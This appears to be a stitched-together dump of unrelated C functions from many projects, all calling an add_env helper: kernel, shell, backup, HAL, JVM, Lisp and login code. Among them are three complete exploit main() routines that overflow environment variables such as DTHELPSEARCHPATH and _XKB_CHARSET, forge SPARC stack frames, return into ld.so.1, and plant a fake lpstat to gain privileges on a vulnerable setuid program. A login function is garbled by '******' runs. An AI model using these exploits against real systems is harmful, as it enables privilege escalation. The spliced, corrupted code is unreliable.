static int mmc_bus_uevent(struct device *dev, char **envp, int num_envp, char *buf, int buf_size) { struct mmc_card *card = dev_to_mmc_card(dev); int retval = 0, i = 0, length = 0; #define add_env(fmt,val) do { \ retval = add_uevent_var(envp, num_envp, &i, \ buf, buf_size, &length, \ fmt, val); \ if (retval) \ return retval; \ } while (0); switch (card->type) { case MMC_TYPE_MMC: add_env("MMC_TYPE=%s", "MMC"); break; case MMC_TYPE_SD: add_env("MMC_TYPE=%s", "SD"); break; } add_env("MMC_NAME=%s", mmc_card_name(card)); #undef add_env envp[i] = NULL; return 0; }
static int mmc_bus_hotplug(struct device *dev, char **envp, int num_envp, char *buf, int buf_size) { struct mmc_card *card = dev_to_mmc_card(dev); char ccc[13]; int i = 0; #define add_env(fmt,val) \ ({ \ int len, ret = -ENOMEM; \ if (i < num_envp) { \ envp[i++] = buf; \ len = snprintf(buf, buf_size, fmt, val) + 1; \ buf_size -= len; \ buf += len; \ if (buf_size >= 0) \ ret = 0; \ } \ ret; \ }) for (i = 0; i < 12; i++) ccc[i] = card->csd.cmdclass & (1 << i) ? '1' : '0'; ccc[12] = '\0'; i = 0; add_env("MMC_CCC=%s", ccc); add_env("MMC_MANFID=%06x", card->cid.manfid); add_env("MMC_NAME=%s", mmc_card_name(card)); add_env("MMC_OEMID=%04x", card->cid.oemid); return 0; }
char cd_home(t_arg *targ) { int i; char *str3; if (targ->wtab[1] == NULL) { if ((i = find_env(targ->env, "PWD=")) < 0) if ((targ->env = add_env(targ->env, "PWD", '=', "/")) == NULL) return (1); if ((i = find_env(targ->env, "HOME=")) < 0) if ((targ->env = add_env(targ->env, "HOME", '=', "/")) == NULL) return (1); if ((targ->pwd = get_flagss(targ->env, "PWD")) == NULL || (i = find_env(targ->env, "PWD=")) < 0) return (1); if ((str3 = get_flagss(targ->env, "HOME")) == NULL || (targ->env[i] = concat_str("PWD", '=', str3)) == NULL || (chdir(str3) < 0)) return (1); free(str3); return (2); } return (0); }
ndmp9_error ndmda_data_start_backup (struct ndm_session *sess) { struct ndm_data_agent * da = sess->data_acb; ndmp9_error error = NDMP9_NO_ERR; char cmd[NDMDA_MAX_CMD]; strcpy (cmd, "wrap_"); strcat (cmd, da->bu_type); if (sess->param->log_level > 0) { char tmpbuf[40]; sprintf(tmpbuf, "-d%d", sess->param->log_level); ndmda_add_to_cmd (cmd, tmpbuf); } ndmda_add_to_cmd (cmd, "-c"); ndmda_add_to_cmd (cmd, "-I#3"); add_env (&da->env_tab, cmd); ndma_send_logmsg (sess, NDMP9_LOG_DEBUG, sess->plumb.data, "CMD: %s", cmd); if (ndmda_pipe_fork_exec (sess, cmd, 1) < 0) { return NDMP9_UNDEFINED_ERR; } ndmis_data_start (sess, NDMCHAN_MODE_WRITE); da->data_state.state = NDMP9_DATA_STATE_ACTIVE; da->data_state.operation = NDMP9_DATA_OP_BACKUP; return error; }
char mysh_cd(t_arg *targ, UNUSED char *path) { int i; if ((i = cd_tiret(targ)) == 1) return (1); if (i != 2 && !access(targ->wtab[1], F_OK)) { if (!access(targ->wtab[1], R_OK)) { if ((i = find_env(targ->env, "PWD=")) < 0) if ((targ->env = add_env(targ->env, "PWD", '=', "/")) == NULL) return (1); if ((targ->pwd = get_flagss(targ->env,"PWD")) == NULL || ((i = find_env(targ->env, "PWD=")) < 0)) return (1); free(targ->env[i]); if ((targ->env[i] = concat_str("PWD", '=', targ->wtab[1])) == NULL || chdir(targ->wtab[1]) < 0) return (1); } else write(2, "Error while accessing path, no rights.\n", 40); } else if (i != 2) write(2, "No such file or directory.\n", 28); return (0); }
void my_set_env(t_mysh *mysh) { char *param_in_env; int i; i = 0; while (mysh->tab_com[i]) i++; if (comp_str(mysh->tab_com[0], "setenv") == 1 && mysh->tab_com[1] && i < 4) { if ((param_in_env = src_env(mysh->env, mysh->tab_com[1]))) update_env(mysh); else add_env(mysh); if (param_in_env) free (param_in_env); } else if (comp_str(mysh->tab_com[0], "setenv") == 1 && i == 1) { i = -1; while (mysh->env && mysh->env[++i]) my_printf("%s\n", mysh->env[i]); } else if (comp_str(mysh->tab_com[0], "setenv") == 1 && i >= 4) my_error("setenv: Too many arguments.\n"); }
ndmp9_error ndmda_data_start_recover_fh (struct ndm_session *sess) { struct ndm_data_agent * da = sess->data_acb; ndmp9_error error = NDMP9_NO_ERR; char cmd[NDMDA_MAX_CMD]; strcpy (cmd, "wrap_"); strcat (cmd, da->bu_type); ndmda_add_to_cmd (cmd, "-t"); ndmda_add_to_cmd (cmd, "-I#3"); add_env (&da->env_tab, cmd); add_nlist (&da->nlist_tab, cmd); ndma_send_logmsg (sess, NDMP9_LOG_DEBUG, sess->plumb.data, "CMD: %s", cmd); if (ndmda_pipe_fork_exec (sess, cmd, 0) < 0) { return NDMP9_UNDEFINED_ERR; } ndmis_data_start (sess, NDMCHAN_MODE_READ); da->data_state.state = NDMP9_DATA_STATE_ACTIVE; da->data_state.operation = NDMP9_DATA_OP_RECOVER_FILEHIST; return error; }
void ft_setenv(char **env, char *name, char *value) { int i; int j; int g; char *e_title; i = 0; g = 0; while (env[i]) { j = 0; while (env[i][j] != '\0' && env[i][j] != '=') j++; if (env[i][j] != '\0') { e_title = ft_strsub(env[i], 0, j); if (ft_strcmp(e_title, name) == 0) { set_env(env, i, j, value); g++; } ft_memdel((void **)&e_title); } i++; } if (g == 0) add_env(env, i, name, value); }
static void add_basic_env(DBusMessageIter *iter, const gchar *udi) { struct utsname un; char *server_addr; if (hald_is_verbose) { add_env(iter, "HALD_VERBOSE", "1"); } if (hald_is_initialising) { add_env(iter, "HALD_STARTUP", "1"); } if (hald_use_syslog) { add_env(iter, "HALD_USE_SYSLOG", "1"); } add_env(iter, "UDI", udi); server_addr = hald_dbus_local_server_addr(); add_env(iter, "HALD_DIRECT_ADDR", server_addr); dbus_free (server_addr); #ifdef HAVE_POLKIT add_env(iter, "HAVE_POLKIT", "1"); #endif if (uname(&un) >= 0) { char *sysname; sysname = g_ascii_strdown(un.sysname, -1); add_env(iter, "HALD_UNAME_S", sysname); g_free(sysname); } }
JvmtiThreadState::JvmtiThreadState(JavaThread* thread) : _thread_event_enable() { assert(JvmtiThreadState_lock->is_locked(), "sanity check"); _thread = thread; _exception_detected = false; _exception_caught = false; _debuggable = true; _hide_single_stepping = false; _hide_level = 0; _pending_step_for_popframe = false; _class_being_redefined = NULL; _class_load_kind = jvmti_class_load_kind_load; _head_env_thread_state = NULL; _dynamic_code_event_collector = NULL; _vm_object_alloc_event_collector = NULL; _the_class_for_redefinition_verification = NULL; _scratch_class_for_redefinition_verification = NULL; _cur_stack_depth = UNKNOWN_STACK_DEPTH; // JVMTI ForceEarlyReturn support _pending_step_for_earlyret = false; _earlyret_state = earlyret_inactive; _earlyret_tos = ilgl; _earlyret_value.j = 0L; _earlyret_oop = NULL; // add all the JvmtiEnvThreadState to the new JvmtiThreadState { JvmtiEnvIterator it; for (JvmtiEnvBase* env = it.first(); env != NULL; env = it.next(env)) { if (env->is_valid()) { add_env(env); } } } // link us into the list { // The thread state list manipulation code must not have safepoints. // See periodic_clean_up(). debug_only(No_Safepoint_Verifier nosafepoint;) _prev = NULL; _next = _head; if (_head != NULL) { _head->_prev = this; } _head = this; }
int change_env(t_duo **env, char *name, char *value) { t_duo *cpy; cpy = *env; while (cpy) { if (ft_strcmp(cpy->name, name) == 0) { free(cpy->value); cpy->value = ft_strdup(value); return (1); } cpy = cpy->next; } add_env(env, name, value); free(cpy); return (0); }
Obj *apply(Env *env, Obj *root, Obj **fn, Obj **args) { if ((*fn)->type == TPRIMITIVE) { if ((*args) != Nil && (*args)->type != TCELL) error("argument must be a list"); return (*fn)->fn(env, root, args); } if ((*fn)->type == TFUNCTION) { VAR(body); VAR(params); VAR(eargs); *body = (*fn)->body; *params = (*fn)->params; Env newenv; *eargs = eval_list(env, root, args); add_env(env, root, &newenv, params, eargs); return progn(&newenv, root, body); } error("not supported"); return NULL; }
Obj *macroexpand(Env *env, Obj *root, Obj **obj) { if ((*obj)->type != TCELL || (*obj)->car->type != TSYMBOL) return *obj; VAR(macro); VAR(args); VAR(body); VAR(params); *macro = find((*obj)->car->name, env); if (!*macro) return *obj; *macro = (*macro)->cdr; if ((*macro)->type != TMACRO) return *obj; *args = (*obj)->cdr; *body = (*macro)->body; *params = (*macro)->params; Env newenv; add_env(env, root, &newenv, params, args); return progn(&newenv, root, body); }
static int krb5_start_session (const struct passwd *pwd) { krb5_error_code ret; char residual[64]; /* copy credentials to file cache */ snprintf(residual, sizeof(residual), "FILE:/tmp/krb5cc_%u", (unsigned)pwd->pw_uid); krb5_cc_resolve(context, residual, &id2); ret = krb5_cc_copy_cache(context, id, id2); if (ret == 0) add_env("KRB5CCNAME", residual); else { krb5_cc_destroy (context, id2); return ret; } krb5_cc_close(context, id2); krb5_cc_destroy(context, id); return 0; }
char cd_tiret(t_arg *targ) { char *tmp; int i; if (targ->wtab[1] != NULL && !my_strncmp(targ->wtab[1], "-", 1) && targ->pwd != NULL) { tmp = targ->pwd; if ((i = find_env(targ->env, "PWD=")) < 0) if ((targ->env = add_env(targ->env, "PWD", '=', "/")) == NULL) return (1); if ((targ->pwd = get_flagss(targ->env, "PWD")) == NULL) return (1); free(targ->env[i]); if ((targ->env[i] = concat_str("PWD", '=', tmp)) == NULL || chdir(tmp) < 0) return (1); return (2); } return (cd_home(targ)); }
/* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], var1[VARSIZE], var2[VARSIZE]; char platform[256], release[256], display[256]; int i, offset, ret, var1_addr, var2_addr; int plat_len, prog_len, rel; char *arg[2] = {"foo", NULL}; int arg_len = 4, arg_pos = 1; int sb = ((int)argv[0] | 0xffff) & 0xfffffffc; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* read command line */ if (argc != 2) { fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]); exit(1); } sprintf(display, "DISPLAY=%s", argv[1]); /* get some system information */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); rel = atoi(release + 2); /* prepare the evil buffer */ memset(buf, 'A', sizeof(buf)); buf[sizeof(buf) - 1] = 0x0; memcpy(buf, "DTHELPSEARCHPATH=", 17); /* prepare the evil env vars */ memset(var1, 'B', sizeof(var1)); var1[sizeof(var1) - 1] = 0x0; memset(var2, 'C', sizeof(var2)); var2[sizeof(var2) - 1] = 0x0; /* fill the envp, keeping padding */ var1_addr = add_env(sc); var2_addr = add_env(var1); add_env(var2); add_env(display); add_env("PATH=/usr/bin:/bin:/usr/sbin:/sbin"); add_env("HOME=/tmp"); add_env(buf); add_env(NULL); /* calculate the offset to argv[0] (voodoo magic) */ plat_len = strlen(platform) + 1; prog_len = strlen(VULN) + 1; offset = arg_len + env_len + plat_len + prog_len; if (rel > 7) VOODOO64(offset, arg_pos, env_pos) else VOODOO32(offset, plat_len, prog_len) /* calculate the needed addresses */ ret = sb - offset + arg_len; var1_addr += ret; var2_addr += ret; /* fill the evil buffer */ for (i = 17; i < BUFSIZE - 8; i += 4) set_val(buf, i, var1_addr - 5000); /* fill the evil env vars */ for (i = 0; i < VARSIZE - 8; i += 4) set_val(var1, i, var2_addr - 500); for (i = 0; i < VARSIZE - 8; i += 4) set_val(var2, i, ret); /* print some output */ fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using var1 address\t: 0x%p\n", (void *)var1_addr); fprintf(stderr, "Using var2 address\t: 0x%p\n", (void *)var2_addr); fprintf(stderr, "Using ret address\t: 0x%p\n\n", (void *)ret); /* run the vulnerable program */ execve(VULN, arg, env); perror("execve"); exit(0); }
int main(int argc, char **argv) { int max_tries = 5; int try; char username[32]; int optidx = 0; int ask = 1; struct sigaction sa; setprogname(argv[0]); #ifdef KRB5 { krb5_error_code ret; ret = krb5_init_context(&context); if (ret) errx (1, "krb5_init_context failed: %d", ret); } #endif openlog("login", LOG_ODELAY | LOG_PID, LOG_AUTH); if (getarg (args, sizeof(args) / sizeof(args[0]), argc, argv, &optidx)) usage (1); argc -= optidx; argv += optidx; if(help_flag) usage(0); if (version_flag) { print_version (NULL); return 0; } if (geteuid() != 0) errx(1, "only root may use login, use su"); /* Default tty settings. */ stty_default(); if(p_flag) copy_env(); else { /* this set of variables is always preserved by BSD login */ if(getenv("TERM")) add_env("TERM", getenv("TERM")); if(getenv("TZ")) add_env("TZ", getenv("TZ")); } if(*argv){ if(strchr(*argv, '=') == NULL && strcmp(*argv, "-") != 0){ strlcpy (username, *argv, sizeof(username)); ask = 0; } } #if defined(DCE) && defined(AIX) esetenv("AUTHSTATE", "DCE", 1); #endif /* XXX should we care about environment on the command line? */ memset(&sa, 0, sizeof(sa)); sa.sa_handler = sig_handler; sigemptyset(&sa.sa_mask); sa.sa_flags = 0; sigaction(SIGALRM, &sa, NULL); alarm(login_timeout); for(try = 0; try < max_tries; try++){ struct passwd *pwd; char password[128]; int ret; char ttname[32]; char *tty, *ttyn; char prompt[128]; #ifdef OTP char otp_str[256]; #endif if(ask){ f_flag = 0; #if 0 r_flag = 0; #endif ret = read_string("login: "******""); } else #endif { #ifdef OTP if(auth_level && strcmp(auth_level, "otp") == 0 && otp_challenge(&otp_ctx, username, otp_str, sizeof(otp_str)) == 0) snprintf (prompt, sizeof(prompt), "%s's %s Password: "******"Password: "******"Login incorrect.\n"); ask = 1; continue; } if(f_flag == 0 && check_password(pwd, password)){ fprintf(stderr, "Login incorrect.\n"); ask = 1; continue; } ttyn = ttyname(STDIN_FILENO); if(ttyn == NULL){ snprintf(ttname, sizeof(ttname), "%s??", _PATH_TTY); ttyn = ttname; } if (strncmp (ttyn, _PATH_DEV, strlen(_PATH_DEV)) == 0) tty = ttyn + strlen(_PATH_DEV); else tty = ttyn; if (login_access (pwd, remote_host ? remote_host : tty) == 0) { fprintf(stderr, "Permission denied\n"); if (remote_host) syslog(LOG_NOTICE, "%s LOGIN REFUSED FROM %s", pwd->pw_name, remote_host); else syslog(LOG_NOTICE, "%s LOGIN REFUSED ON %s", pwd->pw_name, tty); exit (1); } else { if (remote_host) syslog(LOG_NOTICE, "%s LOGIN ACCEPTED FROM %s ppid=%d", pwd->pw_name, remote_host, (int) getppid()); else syslog(LOG_NOTICE, "%s LOGIN ACCEPTED ON %s ppid=%d", pwd->pw_name, tty, (int) getppid()); } alarm(0); do_login(pwd, tty, ttyn); } exit(1); }
/* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], var[VARSIZE], ff[FFSIZE]; char platform[256], release[256], display[256]; int i, offset, ff_addr, sc_addr; int plat_len, prog_len, rel; char *arg[2] = {"foo", NULL}; int arg_len = 4, arg_pos = 1; int ret, rwx_mem; /* get the stack base */ int sb = ((int)argv[0] | 0xffff) & 0xfffffffc; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* read command line */ if (argc != 2) { fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]); exit(2); } sprintf(display, "DISPLAY=%s", argv[1]); /* get some system information */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); rel = atoi(release + 2); /* get the address of strcpy() or sprintf() in ld.so.1 */ ret = (rel < 10 ? search_ldso("strcpy") : search_ldso("sprintf")); /* get the address of RWX memory segment inside ld.so.1 */ rwx_mem = search_rwx_mem(); /* prepare the evil buffer */ memset(buf, 'A', sizeof(buf)); buf[sizeof(buf) - 1] = 0x0; memcpy(buf, "_XKB_CHARSET=", 13); /* prepare the evil env var */ memset(var, 'B', sizeof(var)); var[sizeof(var) - 1] = 0x0; /* prepare the fake frame */ bzero(ff, sizeof(ff)); /* * saved %l registers */ set_val(ff, i = 0, DUMMY); /* %l0 */ set_val(ff, i += 4, DUMMY); /* %l1 */ set_val(ff, i += 4, DUMMY); /* %l2 */ set_val(ff, i += 4, DUMMY); /* %l3 */ set_val(ff, i += 4, DUMMY); /* %l4 */ set_val(ff, i += 4, DUMMY); /* %l5 */ set_val(ff, i += 4, DUMMY); /* %l6 */ set_val(ff, i += 4, DUMMY); /* %l7 */ /* * saved %i registers */ set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to function */ set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to function */ set_val(ff, i += 4, DUMMY); /* %i2 */ set_val(ff, i += 4, DUMMY); /* %i3 */ set_val(ff, i += 4, DUMMY); /* %i4 */ set_val(ff, i += 4, DUMMY); /* %i5 */ set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */ set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */ /* fill the envp, keeping padding */ sc_addr = add_env(ff); add_env(sc); add_env(display); add_env(buf); add_env(var); add_env(NULL); /* calculate the offset to argv[0] (voodoo magic) */ plat_len = strlen(platform) + 1; prog_len = strlen(VULN) + 1; offset = arg_len + env_len + plat_len + prog_len; if (rel > 7) VOODOO64(offset, arg_pos, env_pos) else VOODOO32(offset, plat_len, prog_len) /* calculate the needed addresses */ ff_addr = sb - offset + arg_len; sc_addr += ff_addr; /* set fake frame's %i1 */ set_val(ff, 36, sc_addr); /* 2nd arg to function */ /* fill the evil buffer */ for (i = 13 + 256; i < 13 + 256 + 56; i += 4) set_val(buf, i, sb - 2048); /* we don't need to bruteforce */ set_val(buf, 13 + 256 + 56, ff_addr); /* fake frame address */ set_val(buf, 13 + 256 + 60, ret - 4); /* function, after the save */ /* fill the evil env var */ for (i = 0; i < VARSIZE - 8; i += 4) set_val(var, i, sb - 2048); /* print some output */ fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr); fprintf(stderr, "Using function address\t: 0x%p\n\n", (void *)ret); /* run the vulnerable program */ execve(VULN, arg, env); perror("execve"); exit(0); }
/* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], ff[FFSIZE], ret_var[16], fpt_var[16]; char platform[256], release[256], display[256]; int i, offset, ff_addr, sc_addr, ret_pos, fpt_pos; int plat_len, prog_len, rel; char *arg[2] = {"foo", NULL}; int arg_len = 4, arg_pos = 1; int sb = ((int)argv[0] | 0xffff) & 0xfffffffc; int ret = search_ldso("strcpy"); /* or sprintf */ int rwx_mem = search_rwx_mem(); /* fake lpstat code */ if (!strcmp(argv[0], "lpstat")) { /* check command line */ if (argc != 2) exit(1); /* get ret and fake frame addresses from environment */ ret = (int)strtoul(getenv("RET"), (char **)NULL, 0); ff_addr = (int)strtoul(getenv("FPT"), (char **)NULL, 0); /* prepare the evil printer name */ memset(buf, 'A', sizeof(buf)); buf[sizeof(buf) - 1] = 0x0; /* fill with return and fake frame addresses */ for (i = 0; i < BUFSIZE; i += 4) { /* apparently, we don't need to bruteforce */ set_val(buf, i, ret - 4); set_val(buf, i += 4, ff_addr); } /* print the expected output and exit */ if(!strcmp(argv[1], "-v")) { fprintf(stderr, "lpstat called with -v\n"); printf("device for %s: /dev/null\n", buf); } else { fprintf(stderr, "lpstat called with -d\n"); printf("system default destination: %s\n", buf); } exit(0); } /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* read command line */ if (argc != 2) { fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]); exit(1); } sprintf(display, "DISPLAY=%s", argv[1]); /* get some system information */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); rel = atoi(release + 2); /* prepare the fake frame */ bzero(ff, sizeof(ff)); /* * saved %l registers */ set_val(ff, i = 0, DUMMY); /* %l0 */ set_val(ff, i += 4, DUMMY); /* %l1 */ set_val(ff, i += 4, DUMMY); /* %l2 */ set_val(ff, i += 4, DUMMY); /* %l3 */ set_val(ff, i += 4, DUMMY); /* %l4 */ set_val(ff, i += 4, DUMMY); /* %l5 */ set_val(ff, i += 4, DUMMY); /* %l6 */ set_val(ff, i += 4, DUMMY); /* %l7 */ /* * saved %i registers */ set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */ set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */ set_val(ff, i += 4, DUMMY); /* %i2 */ set_val(ff, i += 4, DUMMY); /* %i3 */ set_val(ff, i += 4, DUMMY); /* %i4 */ set_val(ff, i += 4, DUMMY); /* %i5 */ set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */ set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */ /* fill the envp, keeping padding */ sc_addr = add_env(ff); add_env(sc); ret_pos = env_pos; add_env("RET=0x41414141"); fpt_pos = env_pos; add_env("FPT=0x42424242"); add_env(display); add_env("PATH=.:/usr/bin"); add_env("HOME=/tmp"); add_env(NULL); /* calculate the offset to argv[0] (voodoo magic) */ plat_len = strlen(platform) + 1; prog_len = strlen(VULN) + 1; offset = arg_len + env_len + plat_len + prog_len; if (rel > 7) VOODOO64(offset, arg_pos, env_pos) else VOODOO32(offset, plat_len, prog_len) /* calculate the needed addresses */ ff_addr = sb - offset + arg_len; sc_addr += ff_addr; /* set fake frame's %i1 */ set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */ /* overwrite RET and FPT env vars with the right addresses */ sprintf(ret_var, "RET=0x%x", ret); env[ret_pos] = ret_var; sprintf(fpt_var, "FPT=0x%x", ff_addr); env[fpt_pos] = fpt_var; /* create a symlink for the fake lpstat */ unlink("lpstat"); symlink(argv[0], "lpstat"); /* print some output */ fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr); fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); /* run the vulnerable program */ execve(VULN, arg, env); perror("execve"); exit(0); }
static void do_login(const struct passwd *pwd, char *tty, char *ttyn) { #ifdef HAVE_GETSPNAM struct spwd *sp; #endif int rootlogin = (pwd->pw_uid == 0); gid_t tty_gid; struct group *gr; const char *home_dir; int i; if(!rootlogin) checknologin(); #ifdef HAVE_GETSPNAM sp = getspnam(pwd->pw_name); #endif update_utmp(pwd->pw_name, remote_host ? remote_host : "", tty, ttyn); gr = getgrnam ("tty"); if (gr != NULL) tty_gid = gr->gr_gid; else tty_gid = pwd->pw_gid; if (chown (ttyn, pwd->pw_uid, tty_gid) < 0) { warn("chown %s", ttyn); if (rootlogin == 0) exit (1); } if (chmod (ttyn, S_IRUSR | S_IWUSR | S_IWGRP) < 0) { warn("chmod %s", ttyn); if (rootlogin == 0) exit (1); } #ifdef HAVE_SETLOGIN if(setlogin(pwd->pw_name)){ warn("setlogin(%s)", pwd->pw_name); if(rootlogin == 0) exit(1); } #endif if(rootlogin == 0) { const char *file = login_conf_get_string("limits"); if(file == NULL) file = _PATH_LIMITS_CONF; read_limits_conf(file, pwd); } #ifdef HAVE_SETPCRED if (setpcred (pwd->pw_name, NULL) == -1) warn("setpcred(%s)", pwd->pw_name); #endif /* HAVE_SETPCRED */ #ifdef HAVE_INITGROUPS if(initgroups(pwd->pw_name, pwd->pw_gid)){ warn("initgroups(%s, %u)", pwd->pw_name, (unsigned)pwd->pw_gid); if(rootlogin == 0) exit(1); } #endif if(do_osfc2_magic(pwd->pw_uid)) exit(1); if(setgid(pwd->pw_gid)){ warn("setgid(%u)", (unsigned)pwd->pw_gid); if(rootlogin == 0) exit(1); } if(setuid(pwd->pw_uid) || (pwd->pw_uid != 0 && setuid(0) == 0)) { warn("setuid(%u)", (unsigned)pwd->pw_uid); if(rootlogin == 0) exit(1); } /* make sure signals are set to default actions, apparently some OS:es like to ignore SIGINT, which is not very convenient */ for (i = 1; i < NSIG; ++i) signal(i, SIG_DFL); /* all kinds of different magic */ #ifdef HAVE_GETSPNAM check_shadow(pwd, sp); #endif #if defined(HAVE_GETUDBNAM) && defined(HAVE_SETLIM) { struct udb *udb; long t; const long maxcpu = 46116860184; /* some random constant */ udb = getudbnam(pwd->pw_name); if(udb == UDB_NULL) errx(1, "Failed to get UDB entry."); t = udb->ue_pcpulim[UDBRC_INTER]; if(t == 0 || t > maxcpu) t = CPUUNLIM; else t *= 100 * CLOCKS_PER_SEC; if(limit(C_PROC, 0, L_CPU, t) < 0) warn("limit C_PROC"); t = udb->ue_jcpulim[UDBRC_INTER]; if(t == 0 || t > maxcpu) t = CPUUNLIM; else t *= 100 * CLOCKS_PER_SEC; if(limit(C_JOBPROCS, 0, L_CPU, t) < 0) warn("limit C_JOBPROCS"); nice(udb->ue_nice[UDBRC_INTER]); } #endif #if defined(HAVE_SGI_GETCAPABILITYBYNAME) && defined(HAVE_CAP_SET_PROC) /* XXX SGI capability hack IRIX 6.x (x >= 0?) has something called capabilities, that allow you to give away permissions (such as chown) to specific processes. From 6.5 this is default on, and the default capability set seems to not always be the empty set. The problem is that the runtime linker refuses to do just about anything if the process has *any* capabilities set, so we have to remove them here (unless otherwise instructed by /etc/capability). In IRIX < 6.5, these functions was called sgi_cap_setproc, etc, but we ignore this fact (it works anyway). */ { struct user_cap *ucap = sgi_getcapabilitybyname(pwd->pw_name); cap_t cap; if(ucap == NULL) cap = cap_from_text("all="); else cap = cap_from_text(ucap->ca_default); if(cap == NULL) err(1, "cap_from_text"); if(cap_set_proc(cap) < 0) err(1, "cap_set_proc"); cap_free(cap); free(ucap); } #endif home_dir = pwd->pw_dir; if (chdir(home_dir) < 0) { fprintf(stderr, "No home directory \"%s\"!\n", pwd->pw_dir); if (chdir("/")) exit(0); home_dir = "/"; fprintf(stderr, "Logging in with home = \"/\".\n"); } #ifdef KRB5 if (auth == AUTH_KRB5) { krb5_start_session (pwd); } krb5_get_afs_tokens (pwd); krb5_finish (); #endif /* KRB5 */ add_env("PATH", _PATH_DEFPATH); { const char *str = login_conf_get_string("environment"); char buf[MAXPATHLEN]; if(str == NULL) { login_read_env(_PATH_ETC_ENVIRONMENT); } else { while(strsep_copy(&str, ",", buf, sizeof(buf)) != -1) { if(buf[0] == '\0') continue; login_read_env(buf); } } } { const char *str = login_conf_get_string("motd"); char buf[MAXPATHLEN]; if(str != NULL) { while(strsep_copy(&str, ",", buf, sizeof(buf)) != -1) { if(buf[0] == '\0') continue; show_file(buf); } } else { str = login_conf_get_string("welcome"); if(str != NULL) show_file(str); } } add_env("HOME", home_dir); add_env("USER", pwd->pw_name); add_env("LOGNAME", pwd->pw_name); add_env("SHELL", pwd->pw_shell); exec_shell(pwd->pw_shell, rootlogin); }
static pid_t start_child(struct stService *p, int fd, int tcp, int ipv6, int local_port, union sa *remote) { pid_t pid; const char *proto = tcp ? "TCP" : "UDP"; #ifdef CONFIG_IPV6 char buf[INET6_ADDRSTRLEN]; #endif init_env(); add_env("PROTO=%s", proto); if (tcp) { union sa local; socklen_t local_size = sizeof(local); #ifdef CONFIG_IPV6 if (ipv6) { if (getsockname(fd, &local.sa, &local_size) == 0) { add_env("TCPLOCALIP=%s", inet_ntop(AF_INET6, &local.sin6.sin6_addr, buf, sizeof(buf))); } else { add_env("TCPLOCALIP=::"); } add_env("TCPREMOTEIP=%s", inet_ntop(AF_INET6, &remote->sin6.sin6_addr, buf, sizeof(buf))); add_env("%sREMOTEPORT=%d", proto, ntohs(remote->sin6.sin6_port)); } else #endif { if (getsockname(fd, &local.sa, &local_size) == 0) { add_env("TCPLOCALIP=%s", inet_ntoa(local.sin.sin_addr)); } else { add_env("TCPLOCALIP=0.0.0.0"); } add_env("TCPREMOTEIP=%s", inet_ntoa(remote->sin.sin_addr)); add_env("%sREMOTEPORT=%d", proto, ntohs(remote->sin.sin_port)); } } add_env("%sLOCALPORT=%d", proto, local_port); add_env("PATH=%s", getenv("PATH") ?: "/bin:/usr/bin:/sbin:/usr/sbin"); env_pointers[env_count] = 0; #ifdef DEBUG fprintf(stderr, "start_child(%s port %d from %s)\n", proto, local_port, #ifdef CONFIG_IPV6 ipv6 ? inet_ntop(AF_INET6, &remote->sin6.sin6_addr, buf, sizeof(buf)) : #endif inet_ntoa(remote->sin.sin_addr)); { int i; for (i = 0; env_pointers[i]; i++) { fprintf(stderr, "ENV[%d]: %s\n", i, env_pointers[i]); } } #endif pid = vfork(); if (pid == 0) { if (fd != 0) dup2(fd, 0); if (fd != 1) dup2(fd, 1); #if 1 /* Don't redirect stderr to stdout */ if (fd != 2) dup2(fd, 2); #endif if (fd > 2) close(fd); close_all_fds(2); /* There is no execvpe, so we kludge it */ environ = env_pointers; execvp(p->args[0], p->args); fprintf(stderr, "execve failed!\n"); _exit(0); } return(pid); }
